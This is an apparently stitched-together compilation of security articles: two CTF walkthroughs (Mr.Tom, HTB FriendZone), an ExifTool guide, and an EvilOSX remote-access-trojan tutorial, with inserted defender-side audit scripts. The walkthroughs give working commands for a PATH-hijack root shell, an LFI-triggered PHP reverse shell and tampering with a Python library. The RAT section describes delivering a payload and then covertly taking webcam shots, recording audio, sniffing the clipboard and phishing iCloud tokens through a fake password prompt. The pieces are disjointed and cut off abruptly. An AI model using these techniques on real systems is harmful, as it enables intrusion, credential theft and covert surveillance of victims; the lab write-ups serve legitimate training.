Mr.Tom

Security Level: Beginner
Penetration Testing Methodology:

  1. Scanning
  • Nmap
  2. Enumeration
  • Wireshark
  3. Exploitation
  • SSH
  4. Privilege Escalation
  • Exploiting SUID rights
Walkthrough:
Scanning:

Then, as usual, we used our favourite tool Nmap for port scanning. We found that SSH is open and running on two ports, 22 and 65022.
nmap -p- -A 192.168.1.102

So our next step is to find the SSH username and password.

Enumeration:
All we have is the SSH service enabled on the target machine and nothing else, so we started capturing the target machine's traffic with Wireshark.
We tried different filters and found something useful with the UDP filter.
ip.addr==192.168.1.102 && udp


Following the UDP stream, two words caught our attention, whiteshark and whitepointer, which could be the SSH usernames.

In another captured data packet we found the password Ch@ndr!chthye$.

Exploitation:
So far we probably have two usernames and one password.
We tried to SSH into the target with each username in turn; the combination whitepointer / Ch@ndr!chthye$ worked and we successfully logged in to the target system.
After logging in we checked for sudo rights, but the user was not a sudoer. However, /usr/bin/root has the SUID bit set.
Privilege Escalation:
To elevate to a root shell we will exploit the SUID permission on the /usr/bin/root file. Using the strings command we found that the root binary actually runs the whoami command, referenced by bare name rather than by absolute path.

We used the PATH variable methodology to abuse the privileges of the root binary. We created a new file named whoami inside the /tmp directory, put /bin/bash inside it using echo, and gave it full permissions. We then prepended /tmp to PATH.
To know more about the PATH variable, check our article on the same topic.
After that, once we executed /usr/bin/root, it ran our whoami instead of the system one; we got the root shell and then also flag.txt, as anticipated.
cd /tmp
echo "/bin/bash" > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/root
cd /root
cat flag.txt
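A defender-side check for the weakness used above, added here as an example and not part of the original walkthrough: it looks for SUID executables in the usual binary directories and extracts their printable strings (a pure-Python stand-in for the strings command) to flag utilities referenced by bare name, which is what lets the caller's PATH decide which whoami /usr/bin/root actually runs. The command-name list and the directories scanned are assumptions.

```python
import os
import re
import stat

# Utilities commonly invoked from setuid helpers; a reference by bare name
# (no leading '/') is resolved through the caller's PATH. Assumed list.
COMMON_CMDS = {"whoami", "id", "cat", "ls", "ps", "sh", "bash", "cp", "mv",
               "rm", "chmod", "chown", "mount", "umount"}

def printable_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII of at least min_len bytes, like `strings`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def unqualified_commands(data: bytes) -> list:
    """Command names a binary references without an absolute path."""
    hits = set()
    for s in printable_strings(data):
        # "sh -c whoami" style literals are split so each word is examined
        for token in s.split():
            if token in COMMON_CMDS:
                hits.add(token)
    return sorted(hits)

def is_suid(path: str) -> bool:
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def audit_suid(dirs=("/usr/bin", "/usr/sbin", "/bin", "/sbin")) -> dict:
    """Map each SUID binary under dirs to the bare command names it embeds."""
    findings = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            try:
                if not is_suid(path):
                    continue
                with open(path, "rb") as f:
                    cmds = unqualified_commands(f.read())
            except OSError:
                continue  # unreadable or vanished between listing and open
            if cmds:
                findings[path] = cmds
    return findings

if __name__ == "__main__":
    for path, cmds in audit_suid().items():
        print(f"{path}: resolves {', '.join(cmds)} via PATH")
```

Hits are leads rather than verdicts (a binary's own usage text can mention its name); the program-side fix is to invoke helpers by absolute path and reset PATH before any exec.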

Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are available online, they have a static IP. The IP of FriendZone is 10.10.10.123.
Penetration Testing Methodologies
Scanning
  • Nmap
Enumeration
  • SMB shared directory
  • DNS zone transfer
  • MySQL creds
Exploit
  • LFI to RCE
  • Capture the user flag
Privilege Escalation
  • Abusing Python library
  • Capture the root flag
Walkthrough

nmap -sC -sV 10.10.10.123
From the nmap scan we found many open ports, such as 22, 53, 80, 443 and 445, with several services available, and we noted that the SSL certificate is registered to friendzone.red.

Enumeration
Browsing to the vulnerable machine's IP, we are welcomed with the web page shown below.
Here too I noticed friendzone.red, which could be a clue for proceeding further. As per the nmap result, port 53 is open on TCP, which means there may be a possibility of a DNS zone transfer.

Consequently, I switched to another enumeration avenue: null-session SMB enumeration. With the help of SMBMap, a Linux utility, we listed the SMB shares.
smbmap -H 10.10.10.123
We then connected to the general share with smbclient and downloaded creds.txt:
smbclient //10.10.10.123/general
ls
get creds.txt
In this file, I found the following credential, which could be used later.
admin:WORKWORKHhallelujah@#

Next we attempted a DNS zone transfer for friendzone.red against the target's name server:
host -l friendzone.red 10.10.10.123


Exploring administrator1.friendzone.red, we found a login portal, where I submitted the credential found above.

After logging in, the dashboard displayed the message "image_name param is missing", so we supplied the parameters it expects:

https://administrator1.friendzone.red/dashboard.php?image_id=b.jpg&pagename=timestamp

Exploiting LFI


As we knew that /Development is the only share with both read and write permissions, we can place our malicious file inside this share and execute the backdoor through the LFI to obtain a reverse connection.


So we connected to SMB with the help of smbclient and uploaded php-reverse-shell into /Development. Simultaneously we launched a netcat listener in a new terminal to receive the reverse connection from the target.
smbclient //10.10.10.123/Development

Then we executed the uploaded PHP backdoor through the LFI, as shown below:
https://administrator1.friendzone.r...g&pagename=/etc/Development/php-reverse-shell

As soon as we opened the above URL in the browser, we had a netcat session; to obtain a proper shell we imported the Python pty one-liner, and we found our first flag inside /home/friend.
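A detection-side companion to the LFI used above, added as an example that is not part of the original write-up: it pulls the pagename parameter out of constructed web-server log lines modelled on the dashboard.php requests and flags values that are not a bare page name (path separators, traversal, stream wrappers). The log lines, the client IP and the list of include parameters are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Apache combined format, trimmed) modelled on the
# dashboard.php requests in the walkthrough; the client IP is made up.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /dashboard.php?image_id=b.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1" 200 64
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /dashboard.php?image_id=b.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INCLUDE_PARAMS = ("pagename",)            # assumed: parameters the app feeds to include()
WRAPPERS = ("php://", "data:", "file:")   # stream wrappers that bypass a plain file include

def suspicious_include(value: str) -> bool:
    """True when the (URL-decoded) value can escape a bare page name in an include."""
    v = value.lower()
    return any(c in v for c in ("/", "\\", "..", "\x00")) or v.startswith(WRAPPERS)

def flag_lfi(log_text: str) -> list:
    """Return (line_no, param, decoded_value) for requests with a suspicious include parameter."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes values, so ..%2F.. is checked as ../..
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for param in INCLUDE_PARAMS:
            for value in query.get(param, []):
                if suspicious_include(value):
                    hits.append((line_no, param, value))
    return hits

if __name__ == "__main__":
    for line_no, param, value in flag_lfi(SAMPLE_LOG):
        print(f"line {line_no}: {param}={value!r}")
```

On the application side the same rule is the fix: resolve pagename against an allowlist of page names and never pass it to include() as a path.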

We also found the following credential pair:
user=friend
pass=Agpyu12!0.213$

Privilege Escalation
So, with the help of the above-enumerated creds, we tried SSH; luckily we connected, and then tried to identify weak file permissions or roles for escalating privileges to a root shell or the root flag.
ssh friend@10.10.10.123

As I failed to identify any sudo rights or SUID files, I went for pspy64s to examine the running processes of the machine. I downloaded the script into the /tmp directory and gave it full permissions.

On running pspy64s, we noticed that a Python script was being executed by root, which surprised us.

So I decided to take a look at what this script was doing, and used the cat command to read it.
cat /opt/server_admin/reporter.py


Taking advantage of the Python library that reporter.py imports, we can tamper with the os.py module, which is writable here, so that it reads the root flag for us.
cd /tmp
echo "system ('cat /root/root.txt > /tmp/flag')" >> /usr/lib/python2.7/os.py
After some time the scheduled script will write the root flag to /tmp/flag. Thus we obtained the root flag and finished this challenge.
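The weakness abused above is a module on the interpreter's import path that an unprivileged user can modify. As a defender-side check, added here and not part of the original write-up, this script walks sys.path (or a list you pass in) and reports directories and top-level .py modules that are group- or world-writable or not owned by root; the ownership and mode thresholds are assumptions.

```python
import os
import stat
import sys

def mode_issues(mode: int, uid: int) -> list:
    """Why a file or directory is unsafe as import material for a root-run script."""
    issues = []
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    if mode & stat.S_IWGRP:
        issues.append("group-writable")
    if uid != 0:
        issues.append("not owned by root")
    return issues

def audit_import_path(paths=None) -> dict:
    """Map each risky entry (directory or top-level .py module) to its issues.

    sys.path[0] is the directory of the script itself, so for a scheduled
    script that entry is the first thing worth checking.
    """
    findings = {}
    for d in (sys.path if paths is None else paths):
        if not d or not os.path.isdir(d):   # '' and zip/egg entries are skipped
            continue
        candidates = [d] + sorted(
            os.path.join(d, f) for f in os.listdir(d) if f.endswith(".py"))
        for p in candidates:
            try:
                st = os.stat(p)
            except OSError:
                continue
            issues = mode_issues(st.st_mode, st.st_uid)
            if issues:
                findings[p] = issues
    return findings

if __name__ == "__main__":
    # To audit another interpreter, pass its path list, e.g. the output of
    # python2.7 -c 'import sys; print(sys.path)', instead of this one's sys.path.
    for p, why in audit_import_path().items():
        print(f"{p}: {', '.join(why)}")
```

A writable /usr/lib/python2.7/os.py, as in the challenge, shows up here as "group-writable" or "world-writable", which is the condition that turns a root cron job into a privilege escalation.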

Table of Content

  • Introduction to ExifTool
  • Installation
  • Usage of ExifTool
    • Extract the Common Meta-Data Information
    • Extract the Specific Meta-Data Information
    • Extract GPS Co-ordinates
    • Extract Thumbnail Image
    • Extract metadata using specific keywords
  • Writing the Meta-Data Information
  • Removing Meta-Data Information
  • Saving outputs
    • In HTML file
    • In Text File
  • Extracting EXIF data from a Video file
Introduction
ExifTool is developed by Phil Harvey. It is a platform-independent Perl library coupled with a full-featured command-line application for reading, writing and manipulating metadata across a broad range of files, particularly JPEG images. This metadata may comprise information such as the camera make, file type, permissions and file size, and it offers further details about the photograph, like the exposure, the shutter speed and whether the flash fired. ExifTool is probably the simplest way to extract metadata from files, and it is free and open source.
Installation

git clone https://github.com/exiftool/exiftool.git
In addition, we need to install the necessary package for it.
sudo apt-get install libimage-exiftool-perl

Usage of Exiftool
To extract the entire metadata of a file, we just need to execute the given below command:

However, if we need the tag IDs in hexadecimal alongside the Exif tag names, we need to run the following command:
exiftool -H <filename>

The output shows that a lot of information is stored within these Exif tags.

Extract the Common Meta-Data Information
Now execute the given below command which will provide us with the output of the most common Exif tags of the image file.
Extract the Specific Meta-Data Information
We can list a particular meta-information of our image file by simply executing the command given:
We get our desired output displayed along with the respective tag names in list format.
Extract GPS Co-ordinates
The photographs we capture using our smartphones or camera have GPS coordinates embedded as metadata in the image files. To obtain this, we just need to fire the command given below:
Here we got the GPS Position; copying this complete coordinate string into Google Maps gives the exact location of the camera when the picture was taken.
Extract Thumbnail Image
Thumbnails are compressed preview copies of the original images. They are created so the originals can be opened more quickly and act as placeholders for them. In order to extract these thumbnail images, we just need to execute the following command. Here we can see that the thumbnail.jpg file is extracted from the test.jpg image.

Extract metadata using specific keywords
The following command will assist us to extract the metadata information associated with some specific keywords.
Verbose mode generates extended information: when we add -v to the exiftool command it displays comprehensive data about the processing it is performing.
Writing the Meta-Data

To manipulate the exif data we need to execute the following command:
Removing Meta-Data Information


Saving outputs in Multiple Format

  1. In HTML file

Here we can see that the test.html file is generated. We just need to open it in any browser to check our EXIF data output.

  2. In Text File
We can even export our Exif data to a text file, similar to the HTML output. To achieve this, we simply need to execute the following command:
exiftool <filename> > outputexif.txt
Further, we can review the output either by opening it in any text editor or by simply running the command:
cat outputexif.txt

Extracting Exif Data from a Video file
ExifTool not only extracts metadata from the JPG file format but can also read and write a variety of file types. To know more, see the ExifTool documentation.

exiftool <filename.mp4>


Conclusion


In this article, we will learn to use the EvilOSX tool, a Remote Administration Tool (RAT) for establishing a foothold on macOS/OSX platforms. It can dramatically increase access in a matter of seconds.
Table of Content

  • Introduction
  • Installation
  • Usage in Exploitation
  • Usage in Post-Exploitation
    • System Info
    • Webcam
    • Retrieve iCloud auth tokens
    • Microphone
    • Clipboard
  • Conclusion
Introduction
EvilOSX is a RAT (Remote Administration Tool) designed to work on macOS/OSX platforms. It was developed by Marten4n6, and its backbone is the well-known Empire Framework project. It can be modified for use on a Rubber Ducky. The toolkit is packed with features and is designed around a module system that makes debugging, improvements and the addition of other modules easy. Being written in Python, it is also easy to run across different attacking platforms.
Installation
Installing the EvilOSX RAT on the attacker machine, which in our case is Kali Linux, is pretty simple. To begin with, we visit the EvilOSX GitHub page. After getting the git link, we clone EvilOSX to our attacker machine using the git clone command.
git clone https://github.com/Marten4n6/EvilOSX.git



pip install -r requirements.txt



Usage in Exploitation
Since we have successfully installed all the predefined requirements, it is time to run the tool and gain control over some macOS devices. To exploit, we need a payload. To create this payload, we use the start.py file with the builder parameter.
python start.py --builder

After running the script, it asked us to enter the following information:

  • the server host; here we entered our attacker machine IP address (Kali Linux).
  • Next, it asked us for a port; this can be any random port.
  • After this, we are asked for the location of the payload.
  • Next, we have to choose whether we want EvilOSX to work with a Rubber Ducky. Enter 0 if not.
  • Furthermore, we are asked to choose the loader; leave it at the default.
  • After that, we are asked to name the payload so as to phish the user.



After all these choices, a launcher is created as shown in the image given below.
Now we can use any method to deliver this launcher or payload to the victim. In our case, we used a Python HTTP server to get the file onto the victim system. The file is downloaded on the victim system and then, after giving it the proper permissions, the payload is executed as shown in the image given below.
chmod 777 Launcher-39q1q9.py
./Launcher-39a1a9.py



While the launcher runs on the victim, we have to perform some actions on the attacker machine simultaneously. We execute start.py again, but this time in CLI mode, specifying as the parameter the port we used while creating the launcher, as shown in the image.
python start.py -cli --port 4545


Post-Exploitation
After running the start.py script in the previous step, simultaneously with the launcher on the victim machine, we have successfully infiltrated the victim's macOS system. The terminal turns into a framework console as shown in the image. We can configure a page to be shown on startup. Type help to show a list of available commands. We can see the list of active bots with the command bots. To establish a connection to a bot, use


System Info
To get a brief summary of the system, we can use the get info module. This gives us the System Version, Model of the MacOS device. We also get the Battery status in case it is a Laptop. We have the name of the Wi-Fi network it is connected to. It also tells us the privileges the current account has as well as the status of the FileVault.


Webcam
Now we will try to grab a snapshot from the webcam of the macOS device. To do this we use the webcam module. It warns us that a green LED will light up next to the camera.





Retrieve iCloud auth tokens
We can extract the iCloud Authentication that contains information related to the AppleID linked to the device. However, this will first show a prompt on the victim system.



After agreeing to continue, a prompt pops up on the victim system as shown in the image given below. It masquerades as a genuine prompt to trick the victim into entering the password.


After the victim enters the password, we successfully capture the mail ID linked to the device as well as the access tokens, as shown in the image given below.



Microphone




Here we entered 5 seconds and left the service name blank, which made the RAT use a random string, as shown in the given image. A permission prompt pops up on the victim system asking for access to the microphone.



After allowing it, we have the recorded audio in MP3 format saved on our attacker machine in the tmp directory.



Clipboard
We can also sniff clipboard data from the victim machine. To do this we use the clipboard module, which starts a sniffer on the victim machine for the specified time in seconds. After starting the sniffer, any text the victim copies can be viewed as shown in the image given below.
 